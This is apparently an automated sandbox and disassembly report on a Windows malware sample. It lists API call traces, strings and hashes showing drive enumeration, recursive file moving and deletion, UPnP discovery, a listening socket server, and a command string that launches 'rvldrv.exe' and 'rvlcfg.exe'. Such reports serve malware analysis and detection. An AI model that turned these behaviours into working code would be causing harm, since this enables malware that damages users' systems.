                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3549449529-0
                                                                                                                                                                                              • Opcode ID: 2f0b22ba391b773d4c45c64ac6dadd066d7720e91bacc99fadb97576ecf3cd51
                                                                                                                                                                                              • Instruction ID: 96d86bc259bd628418629a5c2f452591d45261003c5ffeff5fe086a58ca8b5ae
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f0b22ba391b773d4c45c64ac6dadd066d7720e91bacc99fadb97576ecf3cd51
                                                                                                                                                                                              • Instruction Fuzzy Hash: EB711C75A00608EFDF14DFA4D988BEF77B4EB48300F14856AE506B7290D779AA40CF69

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 756 4067a0-4067ef CreateDirectoryW wsprintfW FindFirstFileW 757 4067f5-406809 lstrcmpW 756->757 758 4068cf-4068d2 756->758 759 406821 757->759 760 40680b-40681f lstrcmpW 757->760 761 40689c-4068b2 FindNextFileW 759->761 760->759 762 406823-40686c wsprintfW * 2 760->762 761->757 765 4068b8-4068c9 FindClose RemoveDirectoryW 761->765 763 406886-406896 MoveFileExW 762->763 764 40686e-406884 call 4067a0 762->764 763->761 764->761 765->758
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00406F1A,00000000), ref: 004067AF
                                                                                                                                                                                              • wsprintfW.USER32 ref: 004067C5
                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 004067DC
                                                                                                                                                                                              • lstrcmpW.KERNEL32(?,00411368), ref: 00406801
                                                                                                                                                                                              • lstrcmpW.KERNEL32(?,0041136C), ref: 00406817
                                                                                                                                                                                              • wsprintfW.USER32 ref: 0040683A
                                                                                                                                                                                              • wsprintfW.USER32 ref: 0040685A
                                                                                                                                                                                              • MoveFileExW.KERNEL32(?,?,00000009), ref: 00406896
                                                                                                                                                                                              • FindNextFileW.KERNEL32(000000FF,?), ref: 004068AA
                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 004068BF
                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 004068C9
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                                                                                                                                              • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                              • API String ID: 92872011-445461498
                                                                                                                                                                                              • Opcode ID: e29d1c6c13065a126f61562b4b6d2eaef25e121113ba2b4fb370d418db62171d
                                                                                                                                                                                              • Instruction ID: 96f5080d1998a7d60275ba97af61759e4b4e94f5b4bc08b7936e0b3de653678a
                                                                                                                                                                                              • Opcode Fuzzy Hash: e29d1c6c13065a126f61562b4b6d2eaef25e121113ba2b4fb370d418db62171d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 923145B5900218AFDB10DBA0DC88FDA7778BB48701F40C5E9F609A3195DA75EAD4CF98
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 00406F7E
                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,00415DB8,00000104), ref: 00406F90
                                                                                                                                                                                                • Part of subcall function 0040F1F0: CreateFileW.KERNEL32(00406FA0,80000000,00000001,00000000,00000003,00000000,00000000,00406FA0), ref: 0040F210
                                                                                                                                                                                                • Part of subcall function 0040F1F0: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F225
                                                                                                                                                                                                • Part of subcall function 0040F1F0: CloseHandle.KERNEL32(000000FF), ref: 0040F232
                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 004070FA
                                                                                                                                                                                                • Part of subcall function 004063E0: GetLogicalDrives.KERNEL32 ref: 004063E6
                                                                                                                                                                                                • Part of subcall function 004063E0: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406434
                                                                                                                                                                                                • Part of subcall function 004063E0: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406461
                                                                                                                                                                                                • Part of subcall function 004063E0: RegCloseKey.ADVAPI32(?), ref: 0040647E
                                                                                                                                                                                              • Sleep.KERNEL32(000007D0), ref: 004070ED
                                                                                                                                                                                                • Part of subcall function 00406300: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00406353
                                                                                                                                                                                              • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 0040702F
                                                                                                                                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00407044
                                                                                                                                                                                              • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 0040705F
                                                                                                                                                                                              • wsprintfW.USER32 ref: 00407072
                                                                                                                                                                                              • wsprintfW.USER32 ref: 00407092
                                                                                                                                                                                              • wsprintfW.USER32 ref: 004070B5
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                                                                                                                                              • String ID: (%dGB)$%s%s$Unnamed volume
                                                                                                                                                                                              • API String ID: 1650488544-2117135753
                                                                                                                                                                                              • Opcode ID: 36835f4b582c7264fa9310f82983a243ead37fe316eb445b52cb330bcd55ef35
                                                                                                                                                                                              • Instruction ID: b797a4b926279b24144ff746e96c568fb56fd9e530b7e1178aba5a8e6206bca3
                                                                                                                                                                                              • Opcode Fuzzy Hash: 36835f4b582c7264fa9310f82983a243ead37fe316eb445b52cb330bcd55ef35
                                                                                                                                                                                              • Instruction Fuzzy Hash: 244174B1D00214BBEB64DB94DC45FEE7779BB48700F1085A6F20AB61D0DA785B84CF6A
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • socket.WS2_32(00000002,00000002,00000011), ref: 0040E1AA
                                                                                                                                                                                              • htons.WS2_32(0000076C), ref: 0040E1E0
                                                                                                                                                                                              • inet_addr.WS2_32(239.255.255.250), ref: 0040E1EF
                                                                                                                                                                                              • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040E20D
                                                                                                                                                                                                • Part of subcall function 0040B430: htons.WS2_32(00000050), ref: 0040B45D
                                                                                                                                                                                                • Part of subcall function 0040B430: socket.WS2_32(00000002,00000001,00000000), ref: 0040B47D
                                                                                                                                                                                                • Part of subcall function 0040B430: connect.WS2_32(000000FF,?,00000010), ref: 0040B496
                                                                                                                                                                                                • Part of subcall function 0040B430: getsockname.WS2_32(000000FF,?,00000010), ref: 0040B4C8
                                                                                                                                                                                              • bind.WS2_32(000000FF,?,00000010), ref: 0040E243
                                                                                                                                                                                              • lstrlenA.KERNEL32(X#A,00000000,?,00000010), ref: 0040E25C
                                                                                                                                                                                              • sendto.WS2_32(000000FF,X#A,00000000), ref: 0040E26B
                                                                                                                                                                                              • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040E285
                                                                                                                                                                                                • Part of subcall function 0040E310: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040E35E
                                                                                                                                                                                                • Part of subcall function 0040E310: Sleep.KERNEL32(000003E8), ref: 0040E36E
                                                                                                                                                                                                • Part of subcall function 0040E310: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040E38B
                                                                                                                                                                                                • Part of subcall function 0040E310: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040E3A1
                                                                                                                                                                                                • Part of subcall function 0040E310: StrChrA.SHLWAPI(?,0000000D), ref: 0040E3CE
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                                                                                                                                              • String ID: 239.255.255.250$X#A
                                                                                                                                                                                              • API String ID: 726339449-2206458040
                                                                                                                                                                                              • Opcode ID: 6911e90d37da8db62bd51864f6155ca9886bbc89aad1387f27fc75aef26ea545
                                                                                                                                                                                              • Instruction ID: e8e0ae0e245dd7c097b927a75a8676c49a2f7ecfee9f68fb0cb72d84dadb0e27
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6911e90d37da8db62bd51864f6155ca9886bbc89aad1387f27fc75aef26ea545
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F4119B4E00208ABDB04DFE4D989BEEBBB5EF48304F108569F505B7390E7B55A44CB59
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetSystemInfo.KERNEL32(?,?), ref: 00402043
                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
                                                                                                                                                                                              • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
                                                                                                                                                                                                • Part of subcall function 0040DBB0: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040DBCE
                                                                                                                                                                                              • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
                                                                                                                                                                                              • setsockopt.WS2_32 ref: 004020D1
                                                                                                                                                                                              • htons.WS2_32(?), ref: 00402101
                                                                                                                                                                                              • bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
                                                                                                                                                                                              • listen.WS2_32(?,7FFFFFFF), ref: 0040212F
                                                                                                                                                                                              • WSACreateEvent.WS2_32 ref: 0040213A
                                                                                                                                                                                              • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
                                                                                                                                                                                                • Part of subcall function 0040DBE0: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040DC04
                                                                                                                                                                                                • Part of subcall function 0040DBE0: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040DC5F
                                                                                                                                                                                                • Part of subcall function 0040DBE0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040DC9C
                                                                                                                                                                                                • Part of subcall function 0040DBE0: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040DCA7
                                                                                                                                                                                                • Part of subcall function 0040DBE0: DuplicateHandle.KERNEL32(00000000), ref: 0040DCAE
                                                                                                                                                                                                • Part of subcall function 0040DBE0: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040DCC2
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1603358586-0
                                                                                                                                                                                              • Opcode ID: 12e9ac71e1e64606d6e310d867efcd3aad974152cf34b1f89b4218bf20e906ed
                                                                                                                                                                                              • Instruction ID: 7304e093e5df1f4af0f3941d52a0ba2ce6ba101da239ecb0b9d238ba0c2be26e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 12e9ac71e1e64606d6e310d867efcd3aad974152cf34b1f89b4218bf20e906ed
                                                                                                                                                                                              • Instruction Fuzzy Hash: EE41B170640301ABD3209F74CC4AF5B77E4AF44720F108A2DF6A9EA2D4E7F4E545875A
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 0040666B
                                                                                                                                                                                              • CoCreateInstance.OLE32(00413030,00000000,00000001,00413010,00000008), ref: 00406683
                                                                                                                                                                                              • wsprintfW.USER32 ref: 004066C4
                                                                                                                                                                                              • wsprintfW.USER32 ref: 004066E5
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • %comspec%, xrefs: 004066EE
                                                                                                                                                                                              • cl@, xrefs: 004066A0
                                                                                                                                                                                              • /c start %s & start %s\rvldrv.exe & start %s\rvlcfg.exe, xrefs: 004066B8
                                                                                                                                                                                              • /c start %s & start %s\rvlcfg.exe, xrefs: 004066D9
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: wsprintf$CreateInitializeInstance
                                                                                                                                                                                              • String ID: %comspec%$/c start %s & start %s\rvlcfg.exe$/c start %s & start %s\rvldrv.exe & start %s\rvlcfg.exe$cl@
                                                                                                                                                                                              • API String ID: 1147330536-497122036
                                                                                                                                                                                              • Opcode ID: eee1a2fc8572b98f6c40a5fc3c9db374d26e8a3e47ee9b9990b59bb952fb1ff2
                                                                                                                                                                                              • Instruction ID: e126a915917d584c7bd6e3cca15df18ca7e9be12ab45cc4692bb8e15b90f0fb7
                                                                                                                                                                                              • Opcode Fuzzy Hash: eee1a2fc8572b98f6c40a5fc3c9db374d26e8a3e47ee9b9990b59bb952fb1ff2
                                                                                                                                                                                              • Instruction Fuzzy Hash: 67411D75A40208AFC704DF98C885FDEB7B5AF88704F208199F515A72A5C675AE81CB54
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
                                                                                                                                                                                              • socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
                                                                                                                                                                                              • htons.WS2_32(?), ref: 00401508
                                                                                                                                                                                              • setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
                                                                                                                                                                                              • bind.WS2_32(?,?,00000010), ref: 0040153B
                                                                                                                                                                                                • Part of subcall function 00401330: SetEvent.KERNEL32(?,00000000,?,0040154C,00000000), ref: 00401346
                                                                                                                                                                                                • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401352
                                                                                                                                                                                                • Part of subcall function 00401330: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040135C
                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4174406920-0
                                                                                                                                                                                              • Opcode ID: 93d4027be7e49e3bb9003fc5ae654a5e9afe1d061a8d67f74f828f69ef3a14c4
                                                                                                                                                                                              • Instruction ID: 62ed05d6da85abd953b38b2f92cd08377c0ec6205023cd889ce16e316194a11c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 93d4027be7e49e3bb9003fc5ae654a5e9afe1d061a8d67f74f828f69ef3a14c4
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1731F971A443016BE320DF749C46F9BB6E0AF48B10F40493DF659EB2D0D3B4D544879A
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040D782
                                                                                                                                                                                              • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040D7A8
                                                                                                                                                                                              • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040D7DF
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040D7F4
                                                                                                                                                                                              • Sleep.KERNEL32(00000001), ref: 0040D814
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040D81A
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CountTick$Sleepioctlsocketrecv
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 107502007-0
                                                                                                                                                                                              • Opcode ID: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                                                                                                                                              • Instruction ID: 457d80db37ae817004d1223b894239af033459ee6c7143085fc0b5fbd1cdb933
                                                                                                                                                                                              • Opcode Fuzzy Hash: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                                                                                                                                              • Instruction Fuzzy Hash: 13310A75D00209EFCB04DFA4D948AEEBBB0FF44315F10866AE821A7280D7749A54CB99
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • htons.WS2_32(00000050), ref: 0040B45D
                                                                                                                                                                                                • Part of subcall function 0040B3F0: inet_addr.WS2_32(0040B471), ref: 0040B3FA
                                                                                                                                                                                                • Part of subcall function 0040B3F0: gethostbyname.WS2_32(?), ref: 0040B40D
                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000000), ref: 0040B47D
                                                                                                                                                                                              • connect.WS2_32(000000FF,?,00000010), ref: 0040B496
                                                                                                                                                                                              • getsockname.WS2_32(000000FF,?,00000010), ref: 0040B4C8
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • www.update.microsoft.com, xrefs: 0040B467
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                                                                                                                                              • String ID: www.update.microsoft.com
                                                                                                                                                                                              • API String ID: 4063137541-1705189816
                                                                                                                                                                                              • Opcode ID: 6e98f9c7e97e06aef12c993c0efbc8d88427d4f6baa20c341407c54d3fa54141
                                                                                                                                                                                              • Instruction ID: af49af799945b34e8f77a8241ecd355db6f1f506d792f0fdd03f8566860bb8e6
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e98f9c7e97e06aef12c993c0efbc8d88427d4f6baa20c341407c54d3fa54141
                                                                                                                                                                                              • Instruction Fuzzy Hash: DB212CB4D102099BCB04DFE8D946AEEBBB4EF48300F104169E514F7390E7B45A44DBAA
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040DFDD,00000000), ref: 004013D5
                                                                                                                                                                                              • socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                                                                                                                                              • bind.WS2_32(?,?,00000010), ref: 00401429
                                                                                                                                                                                                • Part of subcall function 00401330: SetEvent.KERNEL32(?,00000000,?,0040154C,00000000), ref: 00401346
                                                                                                                                                                                                • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401352
                                                                                                                                                                                                • Part of subcall function 00401330: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040135C
                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00001100,00000000,00000000,00000000), ref: 00401459
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3943618503-0
                                                                                                                                                                                              • Opcode ID: 553d10466bbec8e054a760f45873b700e7f933e75f0b3e1bb69a1e19c2fd66b5
                                                                                                                                                                                              • Instruction ID: 36f5780ae761d5720ce2b15666c8ad773c7a5b56cb4710f169ddd2cda5c78557
                                                                                                                                                                                              • Opcode Fuzzy Hash: 553d10466bbec8e054a760f45873b700e7f933e75f0b3e1bb69a1e19c2fd66b5
                                                                                                                                                                                              • Instruction Fuzzy Hash: DE116674A417106BE3209F749C0AF877AE0AF04B54F50892DF659E72E1E3B49544879A
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CryptAcquireContextW.ADVAPI32(004083EF,00000000,00000000,00000001,F0000040,?,?,0040C889,004083EF,00000004,?,?,0040C8BE,000000FF), ref: 0040C843
                                                                                                                                                                                              • CryptGenRandom.ADVAPI32(004083EF,?,00000000,?,?,0040C889,004083EF,00000004,?,?,0040C8BE,000000FF), ref: 0040C859
                                                                                                                                                                                              • CryptReleaseContext.ADVAPI32(004083EF,00000000,?,?,0040C889,004083EF,00000004,?,?,0040C8BE,000000FF), ref: 0040C865
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1815803762-0
                                                                                                                                                                                              • Opcode ID: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                                                                                                                                              • Instruction ID: f90ee11572ba5f49e3e1a660dc1e1657e7f5db47d76125bfba77a944767198f2
                                                                                                                                                                                              • Opcode Fuzzy Hash: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                                                                                                                                              • Instruction Fuzzy Hash: 69E012B5650208FBDB14DFD1EC49FDA776CAB48B01F108554F709E7180DAB5EA4097A8
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • NtQuerySystemTime.NTDLL(0040BD65), ref: 0040DF2A
                                                                                                                                                                                              • RtlTimeToSecondsSince1980.NTDLL(0040BD65,?), ref: 0040DF38
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.2377734202.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000003.00000002.2377717370.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000003.00000002.2377793062.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_21324.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Time$QuerySecondsSince1980System
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1987401769-0
